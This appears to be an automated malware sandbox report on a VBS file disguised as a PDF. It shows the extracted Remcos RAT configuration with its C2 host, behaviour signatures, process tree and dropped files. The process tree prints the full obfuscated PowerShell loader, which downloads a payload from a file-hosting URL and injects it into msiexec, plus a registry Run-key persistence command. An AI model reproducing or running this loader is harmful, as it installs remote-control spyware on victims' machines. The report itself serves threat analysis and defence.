Overview

overview

10

Static

static

1

202411_257...df.vbs

windows7-x64

10

202411_257...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2024 02:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    202411_257658·pdf.vbs

  • Size

    16KB

  • MD5

    8fae2dd7ad6f5216e37266fa35a2e6c2

  • SHA1

    a7fe9d4ee1d837f7092060ba6f17d99747f8a695

  • SHA256

    8ad7d114db6254a352121ff777a4ddd8da8942d905967271a9dbbc45a027bdcb

  • SHA512

    a66aeda15f3ffdeb6b5c8550c6ea83478a422377565ee46d61ead44a6b0bcd6fa03e624b39753214baca150e2e0fdb6f44af091b9bbe5a276f76409c3b724981

  • SSDEEP

    384:HUViroQ8TyG/RgtLF6p3ezAgYJcaIWkPF:CikzgLeezAguca+

Score
10/10
remcosremotehostdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

5nd42h78s.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-J5NDOL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\202411_257658·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Clavichordists='Rygeannoncernes';;$Tunfiske='winglet';;$Samsendende='Ureteralgia37';;$Interosculantnformationsstrmmers='Begunstiges';;$hydrophiloid='Forelgge';;$Banjoists=$host.Name;function Fetoplacental($Udslusnings){If ($Banjoists) {$Possibilism=4} for ($Interosculant=$Possibilism;;$Interosculant+=5){if(!$Udslusnings[$Interosculant]) { break }$Translatrernes+=$Udslusnings[$Interosculant]}$Translatrernes}function Galvanocautery($Rejsemaalet){ .($Ornamenterede) ($Rejsemaalet)}$Finansierendes=Fetoplacental 'HjrenObduE Ir t Sam. SolWPyreESte.bBetocDiesLApadiPj.dEHex,N OrgT';$Francize=Fetoplacental ' leM Ma o,gehzSka.iOverlBut lBanta nds/';$Urbacity=Fetoplacental 'tidsTCastlUnmasH,no1Du k2';$Frivrdier='Unm [staanNordematttT rn.TanksbladeHaspr GesVtarsi Bu C,ediEPla p pleoT,lfiVictnthertHul mKorsa OphNTappAOpkaGOmphE stjREnt ]So.g:Slop:AbdusSammeviatcPengUSupeRKontISk,dTBittyAllop arer ResoSpi tDisro ounCMusioBrutlafst=.der$M ttU C lrLyssbTushaAb,cCTr eiSestTYe.ry';$Francize+=Fetoplacental 'Dren5 ugb.Alpe0Tutm Wais(IndvWUndeiJer.n onsd E to rotw Pa sMeta MaalNSeveTMaal Efte1 Eli0 Ina.Indv0ka h;Pins BalW OutiF rsnP of6Trac4Flu,;.rac Gipsx Che6Arka4S rm;.dst Ove.rB usvSpik:Vanr1Mund3Alse1 ina.ned,0 M.o) il TastGSemie LukcnonskSpato .er/ Byl2 F,s0Copy1soir0 Bri0tend1 afh0Finl1Vold PostFD.lciValbrIntee .erfSubsoFir xBe s/Nipp1Nota3Dagr1Mine.fdse0';$Luxemburgskes=Fetoplacental 'G unU CorS,acielychr,ons- hidAGa,lgFiskeIndtNCubaT';$Porches=Fetoplacental 'Paagh S itCo ot ColpbatasCorn:Gabb/Ma a/vedldMystrAnneiSokkvS oueImpo.In,ugCh,roGaffoKinegBilllHenveInco. ndc MrkoA elmgamo/ Be u RaicH.of?Hys e Sk x Ampp,picoDemor BattInfr=Accid.isaoSmigwMindnco dlI.dkoPameaMemod Uni&AlfaiNo rd.ejl=Offs1 aciWBrsf7SlavSProneRe.i_RaptLMusiMSiraoMikr8Be loIncoHAnatuElec5IsleZMatsESubsqPatrpHypo7Spor6Nonp7NonsUIndkGLeg fUn i9Un,rqUdpa4UnslEs,ruF Tab0KursUPrinNEngau';$Piletaster=Fetoplacental 'Walt>';$Ornamenterede=Fetoplacental 'UagtIRenoe R nX';$Carnalized='Bestilleres';$Oxalemia='\Rudeknusers.Tow';Galvanocautery (Fetoplacental 'Comp$ TykGMesil LibO ishBGru.AAvallPaym:UopsfEucoJ ,haeKlumr A,rN eprSCellTK.apyEnd R eogIBadlNMe.tG enfe Stiras rNPonteAnimS Sup=Skld$LimneKnstN ,ybvTopp:DobiaCoenPDialpVestD,ncyaKl.mTEle ATo,n+A.tr$enr.oSmudXAntiARefeLUdb eMaalm du ICa,nA');Galvanocautery (Fetoplacental 'Prot$ Kong,aptlBurnO,ernBBal AComoLDrm : lrdHClo OSkanmEffeO iarGHensO JylnKlamO Ch,utva,S An = Hoo$FlesPDi.hOTak rTidyCSeriH EdiEFerisHalc.L ndSBurlPFordlBi liAff tOmta(Unha$SjldP arsiCyulLOs.uECyc t M dA epis RhaT I,dEOdumrFor )');Galvanocautery (Fetoplacental $Frivrdier);$Porches=$Homogonous[0];$Slumlike=(Fetoplacental ' Gl $Ud iGCentlUdhuOlandbYnglASkalLDeli:MarkmLgeso onr raG HarA efinPlasiJambc Hel=ImmeN E.hetastwfors-lighOInteBEx.rj L reSyk cDrjhtBekn fslSUnasyMighsBleaT proePseum Ren.,ver$ uprfOve.I,aseNOwnsASquanBil SLolliPortE Al.r neuEPessnK,nadKingECanoS');Galvanocautery ($Slumlike);Galvanocautery (Fetoplacental 'Koh.$ SupM Byso pfyr,eltgCamea SmanSu ti Ve cHugu.BuskHSorbe uraGibbdLofte var,aecsT,mo[guai$DisaLStrauOps,xPhone,ndem stab EftuKlanrslo gUa,ssSektkHotsePhansFuel]K ri= ens$ ConF R,dr GodaSwa,n entcS ndiGramz F.ee');$Inficeringer=Fetoplacental 'Sp d$FireM.ondoAfstrNon gCimbaCan,n.ilsiemphck ep. PreD .eboDourw mirn avolNedpoSpheaMealdDhunFUndeiindvlRedee olk( A.s$fornPBaktoAabnrTra,cB ugh poseVanrsS ac,Surp$SewnS.arbtU.clo L ncVie kU.nujSu euTreddLikvg ToniAnmen Hvsg ,el)';$Stockjudging=$Fjernstyringernes;Galvanocautery (Fetoplacental ' Ozo$Catog ForlSum.oSkarbLu gaUvirL .vo:unwaSPremUTilbBVildNSt seMisjtGildsFors= San(mytetF opeToxosS lktKass-St mPTabaALsefTGlanH gif Fler$ZandS tattSurtOBesmc T,ekThaijTmreu,anaDLednGSpisIOv rN H mgHenl)');while (!$Subnets) {Galvanocautery (Fetoplacental 'Lrr $DisogunatlO.peosparbneonaDi,glPatr: MidTK rsr Faue Ba d KolebesecTorliReaklNontlBetri Uroo ngn Unss Com=Ln.d$C.rtWTeguaIn ol StaiCa.ad') ;Galvanocautery $Inficeringer;Galvanocautery (Fetoplacental ' C,rsUnt tBladA araRmisit Slu-Uvavs A cL poE nfE S ipGazo ien4');Galvanocautery (Fetoplacental ' Tyk$BygrgHoo LN nnotjelbeleuA KomLStan:SplesA oruAutobCaskn ,ege AnsTIntesHors=Hatt(Tilgt.osieGiansBlo.T sek- DempCheraCuruT K lH tra Sild$Di dsU.peTResuOUnbecSardKkirsjReweuCoendG.spg Sy I.oulNPe,igForb)') ;Galvanocautery (Fetoplacental ' Spa$Bo tGO,relS,rio BloBzooga ,ubLSvin: IndNBouro,addN nurI PunNIndlTSpi eStarrTilsvS ndeChamnS.rotL.boi SkrOT.lsNDriviCircS raktSkil=P il$RistG,negl Vd o kaabI olap inl ,mn:Ka daUndemBeviYGeo OIntesBinyTKr.ohPlu,ePolyNAfbaIForsC,mid+Mel.+Unde%Cor.$UdomH U,eOOverMEnduOTrokGSumpoIssinUbi,OEnkeUBrngS Re,.YohiCT,lloDiblULagenNonct') ;$Porches=$Homogonous[$Noninterventionist]}$Unsavable=324784;$Staveformer7=30867;Galvanocautery (Fetoplacental 'Perf$ ve.GHy,rLSireO S,nB hanATabelu fa: ishSTranvAettI PikDPolaNScapiCamenCri gC,kesTant N me=.ilb MurmGsideeSme.tO,er- ioxcBalaO.enrNK sht CurE.allnMotoTSkot Haa$ KejsMi tt ioo Cu,cK.nskSpinjMorduTindDUd,nGCha I.ften NeoG');Galvanocautery (Fetoplacental 'Kult$ MrkgGishlNonco Beab KoraNon lAcop: vinC ,aosTr iiConuuUds makti La t=Dial Vik[KnitS AroyP onsIse,tTweaeMonkmSpir. LejCfos.o nfanHomovslageAccur.isttBekl] are:ove :OppoFUdsprRejsoFrafm Fa Bcalia Smis Depefrag6Sup 4KemoSlarytBombrTe,niSautnR grgMind(Peri$ An,STampv Le iSyn d eksnP nii,ndenEtplgNectsU in)');Galvanocautery (Fetoplacental 'Huse$Na jgKol.L GoroYderBJeanaslu.lNien:NorsZdirlO quaNVgtfE Ba LPleue B at Con forf= Und Graf[ mboSDe eySpr.s MemtStole FelM ap.dermtSyndEUdgaX.uksT Ulc. FlueIndbNTujaC acoo rh D SkriMosqnPiscG Cy,]panl:Coxc:J leaBestsL wlC emeiBlowIBist.Cap,GSnorESkilt,anssPhott Re.RasylITartN Aang ,fg(Iouf$ForfCP,acSRe kiInteuHypoM Til)');Galvanocautery (Fetoplacental 'tr n$Zorig ForLSubso adsbStakaStavL Eft: Al,A ObjTRapftUnirAIn.fRVideg B iUVergLClee=B.bl$LatiZSta o SidNSlavER tiL orbeAuriTMaan. aneSOleaUAftebF,nosJuncTU agrSna IMeg.nRespgCy n( Ek $MudsUHov NLgevS Gena LysVMaalA atib UndLmadreOm,k,perf$ M ssPeisT SenaSydaV SimE knnf G aoUnaiRGtesMLoxeEKormRDand7 Te )');Galvanocautery $Attargul;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2988
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Clavichordists='Rygeannoncernes';;$Tunfiske='winglet';;$Samsendende='Ureteralgia37';;$Interosculantnformationsstrmmers='Begunstiges';;$hydrophiloid='Forelgge';;$Banjoists=$host.Name;function Fetoplacental($Udslusnings){If ($Banjoists) {$Possibilism=4} for ($Interosculant=$Possibilism;;$Interosculant+=5){if(!$Udslusnings[$Interosculant]) { break }$Translatrernes+=$Udslusnings[$Interosculant]}$Translatrernes}function Galvanocautery($Rejsemaalet){ .($Ornamenterede) ($Rejsemaalet)}$Finansierendes=Fetoplacental 'HjrenObduE Ir t Sam. SolWPyreESte.bBetocDiesLApadiPj.dEHex,N OrgT';$Francize=Fetoplacental ' leM Ma o,gehzSka.iOverlBut lBanta nds/';$Urbacity=Fetoplacental 'tidsTCastlUnmasH,no1Du k2';$Frivrdier='Unm [staanNordematttT rn.TanksbladeHaspr GesVtarsi Bu C,ediEPla p pleoT,lfiVictnthertHul mKorsa OphNTappAOpkaGOmphE stjREnt ]So.g:Slop:AbdusSammeviatcPengUSupeRKontISk,dTBittyAllop arer ResoSpi tDisro ounCMusioBrutlafst=.der$M ttU C lrLyssbTushaAb,cCTr eiSestTYe.ry';$Francize+=Fetoplacental 'Dren5 ugb.Alpe0Tutm Wais(IndvWUndeiJer.n onsd E to rotw Pa sMeta MaalNSeveTMaal Efte1 Eli0 Ina.Indv0ka h;Pins BalW OutiF rsnP of6Trac4Flu,;.rac Gipsx Che6Arka4S rm;.dst Ove.rB usvSpik:Vanr1Mund3Alse1 ina.ned,0 M.o) il TastGSemie LukcnonskSpato .er/ Byl2 F,s0Copy1soir0 Bri0tend1 afh0Finl1Vold PostFD.lciValbrIntee .erfSubsoFir xBe s/Nipp1Nota3Dagr1Mine.fdse0';$Luxemburgskes=Fetoplacental 'G unU CorS,acielychr,ons- hidAGa,lgFiskeIndtNCubaT';$Porches=Fetoplacental 'Paagh S itCo ot ColpbatasCorn:Gabb/Ma a/vedldMystrAnneiSokkvS oueImpo.In,ugCh,roGaffoKinegBilllHenveInco. ndc MrkoA elmgamo/ Be u RaicH.of?Hys e Sk x Ampp,picoDemor BattInfr=Accid.isaoSmigwMindnco dlI.dkoPameaMemod Uni&AlfaiNo rd.ejl=Offs1 aciWBrsf7SlavSProneRe.i_RaptLMusiMSiraoMikr8Be loIncoHAnatuElec5IsleZMatsESubsqPatrpHypo7Spor6Nonp7NonsUIndkGLeg fUn i9Un,rqUdpa4UnslEs,ruF Tab0KursUPrinNEngau';$Piletaster=Fetoplacental 'Walt>';$Ornamenterede=Fetoplacental 'UagtIRenoe R nX';$Carnalized='Bestilleres';$Oxalemia='\Rudeknusers.Tow';Galvanocautery (Fetoplacental 'Comp$ TykGMesil LibO ishBGru.AAvallPaym:UopsfEucoJ ,haeKlumr A,rN eprSCellTK.apyEnd R eogIBadlNMe.tG enfe Stiras rNPonteAnimS Sup=Skld$LimneKnstN ,ybvTopp:DobiaCoenPDialpVestD,ncyaKl.mTEle ATo,n+A.tr$enr.oSmudXAntiARefeLUdb eMaalm du ICa,nA');Galvanocautery (Fetoplacental 'Prot$ Kong,aptlBurnO,ernBBal AComoLDrm : lrdHClo OSkanmEffeO iarGHensO JylnKlamO Ch,utva,S An = Hoo$FlesPDi.hOTak rTidyCSeriH EdiEFerisHalc.L ndSBurlPFordlBi liAff tOmta(Unha$SjldP arsiCyulLOs.uECyc t M dA epis RhaT I,dEOdumrFor )');Galvanocautery (Fetoplacental $Frivrdier);$Porches=$Homogonous[0];$Slumlike=(Fetoplacental ' Gl $Ud iGCentlUdhuOlandbYnglASkalLDeli:MarkmLgeso onr raG HarA efinPlasiJambc Hel=ImmeN E.hetastwfors-lighOInteBEx.rj L reSyk cDrjhtBekn fslSUnasyMighsBleaT proePseum Ren.,ver$ uprfOve.I,aseNOwnsASquanBil SLolliPortE Al.r neuEPessnK,nadKingECanoS');Galvanocautery ($Slumlike);Galvanocautery (Fetoplacental 'Koh.$ SupM Byso pfyr,eltgCamea SmanSu ti Ve cHugu.BuskHSorbe uraGibbdLofte var,aecsT,mo[guai$DisaLStrauOps,xPhone,ndem stab EftuKlanrslo gUa,ssSektkHotsePhansFuel]K ri= ens$ ConF R,dr GodaSwa,n entcS ndiGramz F.ee');$Inficeringer=Fetoplacental 'Sp d$FireM.ondoAfstrNon gCimbaCan,n.ilsiemphck ep. PreD .eboDourw mirn avolNedpoSpheaMealdDhunFUndeiindvlRedee olk( A.s$fornPBaktoAabnrTra,cB ugh poseVanrsS ac,Surp$SewnS.arbtU.clo L ncVie kU.nujSu euTreddLikvg ToniAnmen Hvsg ,el)';$Stockjudging=$Fjernstyringernes;Galvanocautery (Fetoplacental ' Ozo$Catog ForlSum.oSkarbLu gaUvirL .vo:unwaSPremUTilbBVildNSt seMisjtGildsFors= San(mytetF opeToxosS lktKass-St mPTabaALsefTGlanH gif Fler$ZandS tattSurtOBesmc T,ekThaijTmreu,anaDLednGSpisIOv rN H mgHenl)');while (!$Subnets) {Galvanocautery (Fetoplacental 'Lrr $DisogunatlO.peosparbneonaDi,glPatr: MidTK rsr Faue Ba d KolebesecTorliReaklNontlBetri Uroo ngn Unss Com=Ln.d$C.rtWTeguaIn ol StaiCa.ad') ;Galvanocautery $Inficeringer;Galvanocautery (Fetoplacental ' C,rsUnt tBladA araRmisit Slu-Uvavs A cL poE nfE S ipGazo ien4');Galvanocautery (Fetoplacental ' Tyk$BygrgHoo LN nnotjelbeleuA KomLStan:SplesA oruAutobCaskn ,ege AnsTIntesHors=Hatt(Tilgt.osieGiansBlo.T sek- DempCheraCuruT K lH tra Sild$Di dsU.peTResuOUnbecSardKkirsjReweuCoendG.spg Sy I.oulNPe,igForb)') ;Galvanocautery (Fetoplacental ' Spa$Bo tGO,relS,rio BloBzooga ,ubLSvin: IndNBouro,addN nurI PunNIndlTSpi eStarrTilsvS ndeChamnS.rotL.boi SkrOT.lsNDriviCircS raktSkil=P il$RistG,negl Vd o kaabI olap inl ,mn:Ka daUndemBeviYGeo OIntesBinyTKr.ohPlu,ePolyNAfbaIForsC,mid+Mel.+Unde%Cor.$UdomH U,eOOverMEnduOTrokGSumpoIssinUbi,OEnkeUBrngS Re,.YohiCT,lloDiblULagenNonct') ;$Porches=$Homogonous[$Noninterventionist]}$Unsavable=324784;$Staveformer7=30867;Galvanocautery (Fetoplacental 'Perf$ ve.GHy,rLSireO S,nB hanATabelu fa: ishSTranvAettI PikDPolaNScapiCamenCri gC,kesTant N me=.ilb MurmGsideeSme.tO,er- ioxcBalaO.enrNK sht CurE.allnMotoTSkot Haa$ KejsMi tt ioo Cu,cK.nskSpinjMorduTindDUd,nGCha I.ften NeoG');Galvanocautery (Fetoplacental 'Kult$ MrkgGishlNonco Beab KoraNon lAcop: vinC ,aosTr iiConuuUds makti La t=Dial Vik[KnitS AroyP onsIse,tTweaeMonkmSpir. LejCfos.o nfanHomovslageAccur.isttBekl] are:ove :OppoFUdsprRejsoFrafm Fa Bcalia Smis Depefrag6Sup 4KemoSlarytBombrTe,niSautnR grgMind(Peri$ An,STampv Le iSyn d eksnP nii,ndenEtplgNectsU in)');Galvanocautery (Fetoplacental 'Huse$Na jgKol.L GoroYderBJeanaslu.lNien:NorsZdirlO quaNVgtfE Ba LPleue B at Con forf= Und Graf[ mboSDe eySpr.s MemtStole FelM ap.dermtSyndEUdgaX.uksT Ulc. FlueIndbNTujaC acoo rh D SkriMosqnPiscG Cy,]panl:Coxc:J leaBestsL wlC emeiBlowIBist.Cap,GSnorESkilt,anssPhott Re.RasylITartN Aang ,fg(Iouf$ForfCP,acSRe kiInteuHypoM Til)');Galvanocautery (Fetoplacental 'tr n$Zorig ForLSubso adsbStakaStavL Eft: Al,A ObjTRapftUnirAIn.fRVideg B iUVergLClee=B.bl$LatiZSta o SidNSlavER tiL orbeAuriTMaan. aneSOleaUAftebF,nosJuncTU agrSna IMeg.nRespgCy n( Ek $MudsUHov NLgevS Gena LysVMaalA atib UndLmadreOm,k,perf$ M ssPeisT SenaSydaV SimE knnf G aoUnaiRGtesMLoxeEKormRDand7 Te )');Galvanocautery $Attargul;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Perspektivet" /t REG_EXPAND_SZ /d "%Suitly% -windowstyle 1 $Packboard=(gp -Path 'HKCU:\Software\undisclosed\').Itabirite;%Suitly% ($Packboard)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:708
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Perspektivet" /t REG_EXPAND_SZ /d "%Suitly% -windowstyle 1 $Packboard=(gp -Path 'HKCU:\Software\undisclosed\').Itabirite;%Suitly% ($Packboard)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1708

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    977e664ed1b2f29b67bc4d318f651478

    SHA1

    8cbe44ff11c8b47ed25e8cfbc2c05927e1c7bfd1

    SHA256

    7675571695b8d16425f2f41800d164a6d424673db9cd5533a00baca554ad3c9a

    SHA512

    6f3fe3363099ce1f12beacefede1f98f0ff19e5ca2b448ff1eca4e7d890e52e87742b89da108a5d5179cf252703c8206ff38676b92a52d55f713591d1e74adaa

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabDA98.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar8A18.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OGPBC45KU5JI503ZN592.temp
    Filesize

    7KB

    MD5

    6d061f42df2ada009ae0b99f46e6c1e3

    SHA1

    e79421988aabf8273144046b97b52ff1e077be62

    SHA256

    f87a9f92db802fb45249a8392305208f5e19574a9f9ba3a3dc0cb0229d22c6ab

    SHA512

    b975bd23189177ff552d91593c921089cfd691c196ea1a15297e4a635f8b0a3d65f9769d3656837897a8ab2f89ceda8ad72aed01fa8f8b5ea815842572ffd02e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Rudeknusers.Tow
    Filesize

    463KB

    MD5

    3ae889406ac2f0623338e2841e800a5d

    SHA1

    9516341a83a17996ce5d2c9070e79e956662d82f

    SHA256

    90628cbf145ca7e743e051e6fa138c2b54c273d5644036800f68d81330dfa93e

    SHA512

    668907cec94a541db75bd0a71a99d6105329292c3856a976fce2f4b59b23e1f8dc52daf6f0e32f7cb4a0a51b8d7ce601f5ff5f59767e4c4e3361d6fa59e2b08b

    Download Submit

  • memory/2428-66-0x0000000000320000-0x0000000001382000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2428-62-0x0000000000320000-0x0000000001382000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2428-38-0x0000000000320000-0x0000000001382000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2552-37-0x0000000006680000-0x000000000AC43000-memory.dmp

    Filesize

    69.8MB

    Download

  • memory/2988-24-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-30-0x000007FEF629E000-0x000007FEF629F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2988-31-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-33-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-29-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-27-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-26-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-25-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-23-0x000007FEF5FE0000-0x000007FEF697D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2988-22-0x00000000004E0000-0x00000000004E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2988-21-0x000000001B7A0000-0x000000001BA82000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2988-20-0x000007FEF629E000-0x000007FEF629F000-memory.dmp

    Filesize

    4KB

    Download